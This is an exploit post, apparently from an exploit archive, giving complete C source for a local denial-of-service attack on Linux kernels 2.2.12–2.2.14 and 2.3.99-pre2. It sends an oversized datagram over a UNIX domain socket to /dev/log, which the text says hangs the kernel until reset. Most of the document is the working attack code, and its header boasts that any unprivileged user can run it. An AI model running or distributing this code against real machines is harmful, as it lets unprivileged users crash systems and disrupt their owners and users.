The following userspace code will locally hang recent linux machines. The send system call immediately puts the kernel in a loop spewing kmalloc: Size (131076) too large. Linux 2.2.14 and 2.3.99-pre2 are vulnerable.
45b0fb037bd3274c47ba26f3c0a580d1dddbc4ee423482056d3cda35938d40b1
/* [http://b0f.morphed.net] - eth0 */
/* */
/* Vulnerable
Linux 2.2.12
Linux 2.2.13
Linux 2.2.14
Linux 2.3.99-pre2
The following exploit code will hang any Linux machine on various
Pentium
platforms.
Note that this does not require any special privileges, and any user
can
compile and run it, so watch out kiddies...
The send system call immediately puts the kernel in a loop spewing
kmalloc: Size
(131076) too large forever (or until you hit the reset button).
Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter,
despite the documentation to the contrary.
[code provided by eth0 from b0f security]
[information provided by Jay Fenlason]
[http://b0f.morphed.net]
[buffer0verfl0w security]
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data)
);
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)
);
return 0;
}